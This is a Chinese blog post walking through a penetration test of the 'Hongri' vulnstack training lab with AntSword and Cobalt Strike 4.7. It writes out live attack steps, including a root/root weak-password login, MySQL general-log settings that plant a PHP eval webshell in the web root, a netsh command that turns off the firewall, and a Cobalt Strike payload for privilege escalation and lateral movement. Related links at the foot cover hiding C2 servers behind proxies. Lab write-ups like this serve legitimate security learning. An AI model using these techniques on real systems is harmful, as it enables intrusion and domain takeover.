红日靶场一渗透测试流程(附带AntSWord和Cobalt_Strike_4.7的基础运用)

于 2024-05-25 11:39:52 发布
阅读量633 收藏 10
点赞数 16
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xinghen049/article/details/139182856
版权

一、环境搭建

网络搭建

小编这里的win7外网口ip更改为54.66

win7开启phpstudy服务

二、渗透测试

1、信息收集

  1、端口扫描

使用nmap扫描出主机存活,nmap –sn 192.168.54.0/24

  扫描发现192.168.54.66IP地址,进行端口扫描发现主机开放80端口

  2、PHP探针

 尝试去浏览器访问网址 192.168.54.66

得到存储路径,使用dirb扫描,得到管理员登录界面 dirb http://192.168.54.66

访问数据库后台界面

  3、渗透php

尝试弱密码爆破 root/root ,进入sql后台管理界面

输入命令show variables like '%general%'; 查看全局日志保存位置

set global general_log="on";   开启日志配置功能

set global general_log_file='C:/phpstudy/www/yxcms/1.php'; 更改日志保留位置

输入制作反弹shell 用蚁剑远程连接,最常见的一句话木马

SELECT '<?php eval($_POST[shell]);?>'

  4、远程连接

使用蚁剑利用shell远程连接

双击进入win7中

5、使用CS配置木马文件配合蚁剑上传

小编在这里使用的是windows可执行程序

根据以下步骤配置好攻击目标的ip+端口(需要选择不容易被占用的端口)

选择好木马文件保存位置,取一个容易记住的名字

接着回到蚁剑,上传制作好的木马

接着在蚁剑打开终端,输入木马名称启动,回到CS查看回连

二、攻击渗透

一、利用CS提权

二、信息收集

关闭防火墙

shell netsh advfirewall set allprofiles state off

系统明文密码获取,方便后续的域渗透

扫描网段,扫描端口

扫描出以下ip

三、域渗透

一、利用CS横向移动

选择好后,等待回连

到这一步就已经对整个域进行控制了

后续就可以继续进行信息收集,制作黄金票据进行持久化控制等等小编就不在这里一一演示

下面是CS和蚁剑的配置方法

CSkali配置

一、解压后给权限

二、进入文件夹在终端输入./teamserver + 攻击机(kali的ip地址) +登录密码

三、输入账号密码后就可以正常使用了

蚁剑kali配置

一、解压后给上文件夹权限

二、进入文件夹双击蚁剑

三、给上配置库

四、再次打开就可以正常使用了

最后,如果觉得小编做得还可以的话希望可以给个赞支持一下

厂神小白
关注
  • 16
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。 Cobalt Strike 分为客户端组件和服务器组件。 服务器组件,也就是团队服务器,是 Beacon payload 的 控制器,也是 Cobalt Strike 社会工程功能的托管主机。团队服务器还存储由 Cobalt Strike 收集的数据,并管理日志记录。 客户端组件:客户端团队成员使用的图形化界面
最新红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记(2),实战案例
最新发布
2401_84563605的博客
05-12 845
一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中。红日靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/因为是用的慢查询日志,所以说只有当查询语句执行的时间要超过系统默认的时间时,该语句才会被记入进慢查询日志。这里直接是administrator,所有可以直接提到system,实战中还需要其他手段提权。
cobalt_strike_4.7启动报错.teamserver: 行 6: .TeamServerImage: 权限不够(解决方法)
XXokok的博客
12-11 1397
cobalt_strike_4.7启动报错.teamserver: 行 6: .TeamServerImage: 权限不够(解决方法)
反制cobalt_strike_4.7
XXokok的博客
12-12 101
反制cobalt_strike_4.7
Cobalt Strike4.7最新版
11-03
windows及Linux都可兼容的版本,Cobalt Strike是一由美国安全团队研发的渗透测试工具,拥有多种协议等多种功能。Cobalt Strike还可以调用Mimikatz、Ladon等其他知名工具,因此广受技术安全渗透人员的喜爱。它分为客户端和服务端,服务端只有一个,大家可以共同操作shell
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记
热门推荐
qq_41821603的博客
11-24 5万+
这里写目录标题一、环境搭建二、拿下web服务器2.1 信息收集 一、环境搭建 实验环境拓扑如下: windows2008 域控 (host-only) windiws 7 web服务器 (双网卡 host-only + NAT) windows 2003 域内PC (host-only) 二、拿下web服务器 2.1 信息收集 ...
cobalt strike 4.7
06-07
cobalt strike 4.7
CobaltStrike4.7
11-29
cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序...
Cobalt Strike 4.0 dist_Strike!_Cobalt_cobaltstrike_
10-02
cobalt strike distribution package 4.0
Cobalt Strike <=4.7 xss复现和NTLM V2窃取(没有RCE)
crowsec
09-24 3773
CVE-2022-39197这个xss的rce,我只复现了xss和简单版本的NTLM哈希窃取。。。 从前几天开始,网上开始讨论关于cobalt strike的CVE-2022-39197漏洞,据说该漏洞可以直接接管服务端的权限。
CVE-2022-39197(Cobalt Strike XSS <=4.7)漏洞复现(超详细)
box
05-17 2136
2022年09月22日,360CERT监测发现了Cobalt Strike远程代码执行漏洞,漏洞编号为CVE-2022-39197,漏洞等级:严重,漏洞评分:9.8Cobalt Strike(也称CS)由美国Red Team开发,是一款基于java的内网渗透测试工具,是最早的公共红队指挥和控制框架之一。Cobalt Strike旨在通过模拟几种可能的攻击工具和场景,允许渗透测试人员和网络防御人员检查他们的安全专业的强度。然而,安全测试套件也被黑客(包括勒索软件团伙)广泛使用,以渗透目标网络。
在Linux环境搭建Java版Minecraft(我的世界)服务器
Meow_wu的博客
09-27 6701
文章目录前言一、帮助轻松开服的工具1.Xshell2.XFTP二、开服步骤1.准备一个可以满足你需要的Linux服务器2.安装工具3.连接服务器4.配置服务器(确保你已经完成第三步,成功连接上了服务器)1)安装Java(如果你的服务器上已经安装过了,请忽略)2)关闭防火墙3)安装screen5.装载Minecraft服务器后言 前言 本篇内容是为了一些首次尝试使用Linux进行开服的小白服主,提供一些技术上的帮助。因此,将在这里展示较为简单方便,通俗易懂的开服过程以供参考。 一、帮助轻松开服的工具 1.
CobaltStrike反制上线测试
qq_69775412的博客
10-05 2123
CobaltStrike反制上线测试
CobaltStrike搭建内网隧道
Longwaer
02-13 2271
学习CobaltStrike各种隧道搭建小技巧,更好的用于渗透测试中内网横向。
CobaltStrike红队内网渗透软件教程(一)
EnerY3的博客
12-14 516
它最初是作为Metasploit框架的商业版本,但现在已经发展成为独立的产品。该平台提供了许多功能,包括漏洞利用、后渗透行动、社交工程、C2(命令与控制)等。启动服务端并设置连接客户端的密码 ,qwerty是服务端连接客户端的密码,50050是连接端口。Cobalt Strike还包括一些社交工程工具,用于测试目标组织的安全意识和准入测试。Cobalt Strike版本:Cobalt_Strike_4.7。选择我们刚创建的监听器,这里我们输出格式选择Windows EXE。别名:默认的就行,想改也可以。
Cobalt Strike4工具的基础使用
weixin_44257023的博客
07-02 1585
进入CS目录后执行 启动命令 例如 Windows系统启动 管理员运行 cmd 进入CS目录后执行 启动命令 例如: 启动Cobalt Strike4客户端 在Windows下CS目录中一个叫 双击即可(启动失败缺少Java环境) 运行后出现下面界面 javaagent:CobaltStrikeCN.jar是中文汉化插件 登录CS4客户端 主机:服务端ip 端口:没修改默认50050 用户名:随便 密码:密码是你启动服务端设置的 登入成功进入下面 生成木马前一定要有监听器,并且将杀毒软件关闭防止杀掉
denied 登陆后access_后渗透协同平台 Cobalt Strike 常用功能介绍与分析
weixin_39527292的博客
12-06 263
0x00 背景在开展渗透测试项目时,渗透测试工程师会使用大量的渗透测试框架以及工具,如Cobalt Strike。它提供了灵活性强、可用性高、可高度定制的攻击开发和执行环境,同时其具备端口扫描和木马生成等功能。通常在获取系统控制权后,测试人员需根据具体的渗透测试目的和实际测试场景选择使用恰当的方式进行测试,此时需调用相对应的命令。这些命令背后都有其运行原理,掌握其原理可在一定程度上提高渗...
cobalt_strike_c2隐匿多级nginx反向代理
10-17
Cobalt Strike C2 是一个常用的网络攻击工具,用于进行渗透测试和红队行动。为了更好地隐藏自身并增加隐匿性,Cobalt Strike C2 可以通过多级 NGINX 反向代理来进行隐匿。 NGINX 是一个高性能、开源的 Web 服务器和反向代理服务器。使用 NGINX 反向代理可以隐藏 Cobalt Strike C2 服务器的真实 IP 地址,提高其匿名性和免受检测的能力。 多级 NGINX 反向代理是指将一级代理服务器的请求再转发到二级代理服务器,二级代理服务器再将请求转发到 C2 服务器。这样,攻击者可以在多个层次上混淆和隐藏自己的真实 IP 地址,增加对手的追踪难度。 在这个过程中,每一级代理服务器都可以对进出的数据进行进一步的加密和解密,即使被探测到,攻击者也难以解密出真实的数据内容。 通过使用多级 NGINX 反向代理,Cobalt Strike C2 可以在网络上更为隐匿地进行通信,减少被检测和追踪的风险。同时,这种架构还可以提高系统的可扩展性和负载均衡能力,提高对抗DDoS等攻击的能力。 需要注意的是,虽然多级 NGINX 反向代理可以提高 Cobalt Strike C2 的隐匿性,但对于有经验的网络安全人员来说,仍然可以通过其他手段进行识别和检测,因此在实际应用中,还需要结合其他安全措施来提高系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值